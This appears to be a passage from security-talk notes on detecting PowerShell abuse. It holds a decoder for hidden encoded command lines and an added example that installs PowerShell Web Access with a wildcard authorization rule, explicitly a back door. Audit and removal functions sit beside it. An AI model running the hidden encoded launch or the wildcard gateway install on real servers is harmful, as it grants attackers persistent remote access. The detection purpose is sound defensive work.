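$enc     = ConvertTo-EncodedCommand $payload
$sample  = "powershell.exe -NoP -W Hidden -Enc $enc"
$sample

# ... and what the defender recovers from the logged command line.
Get-DecodedCommandLine $sample | Format-List
```

The decode step is the whole detection: the encoded form itself carries no signal, but the decoded text does, which is why a rule that only looks for the `-enc` switch will drown in legitimate management tooling while a rule that decodes and then inspects the content will not.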
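Added example, not part of the talk: what the PowerShell Web Access (PSWA) setup the speaker describes looks like on Windows Server 2012 and later, beside the audit a defender would run for it. The `Install-WindowsFeature`, `Install-PswaWebApplication`, `Add-PswaAuthorizationRule`, `Get-PswaAuthorizationRule`, `Remove-PswaAuthorizationRule` and `Uninstall-PswaWebApplication` cmdlets are Microsoft's; the `Install-PswaGateway`, `Get-PswaState` and `Remove-PswaGateway` functions and the rule name `EmulationTest` are this example's own. Run in an elevated session on a server you are authorised to test.

```powershell
# Added example (not from the talk). PSWA is an optional role feature that publishes a
# browser-based PowerShell console under IIS; the authorization rule is what decides who
# can use it, which is why a wildcard rule is the thing to hunt for.
Import-Module ServerManager

function Install-PswaGateway {
    # 1. Role feature. Its presence on a server that never needed browser-based PowerShell
    #    is a finding in itself.
    Install-WindowsFeature -Name WindowsPowerShellWebAccess -IncludeManagementTools
    # 2. Publishes the /pswa web application under the Default Web Site in IIS.
    #    The self-signed test certificate is the lab setting only.
    Install-PswaWebApplication -UseTestCertificate
    # 3. Without an authorization rule nobody can log in. Any user, any target computer,
    #    any session configuration: this is what turns the gateway into a back door.
    Add-PswaAuthorizationRule -UserName * -ComputerName * -ConfigurationName * -RuleName 'EmulationTest'
}

function Get-PswaState {
    # The audit: is the feature there, and who may use it?
    $feature = Get-WindowsFeature -Name WindowsPowerShellWebAccess
    $rules = @()
    # The Pswa cmdlets only exist once the feature is installed, so resolve them first.
    if ($feature.Installed -and (Get-Command Get-PswaAuthorizationRule -ErrorAction SilentlyContinue)) {
        $rules = @(Get-PswaAuthorizationRule -ErrorAction SilentlyContinue)
    }
    $wildcard = @($rules | Where-Object {
        $_.User -eq '*' -and $_.Destination -eq '*' -and $_.ConfigurationName -eq '*'
    })
    $verdict = if (-not $feature.Installed) { 'PSWA not installed' }
               elseif ($wildcard.Count -gt 0) { 'PSWA installed with wildcard access: investigate' }
               else { 'PSWA installed: confirm it is sanctioned and review each rule' }
    [pscustomobject]@{
        FeatureInstalled = [bool]$feature.Installed
        RuleCount        = $rules.Count
        WildcardRules    = $wildcard.Count
        Rules            = $rules | Select-Object Id, RuleName, User, Destination, ConfigurationName
        Verdict          = $verdict
    }
}

function Remove-PswaGateway {
    # Deleting only the rules is not enough; the speaker's point is that the feature itself
    # is the persistence, so remove the application and the role feature too.
    if (Get-Command Get-PswaAuthorizationRule -ErrorAction SilentlyContinue) {
        Get-PswaAuthorizationRule -ErrorAction SilentlyContinue |
            ForEach-Object { Remove-PswaAuthorizationRule -Id $_.Id -Force }
        Uninstall-PswaWebApplication -ErrorAction SilentlyContinue
    }
    Uninstall-WindowsFeature -Name WindowsPowerShellWebAccess
}

Get-PswaState
```

Running `Get-PswaState` on a fleet of servers (for example through `Invoke-Command`) gives the inventory the talk says most teams are missing: which hosts have a web-reachable PowerShell gateway at all, and which of those let anyone in from anywhere. The install sequence is included so the defender knows exactly what a re-installation after cleanup looks like in the logs, which is the property that makes it persistence.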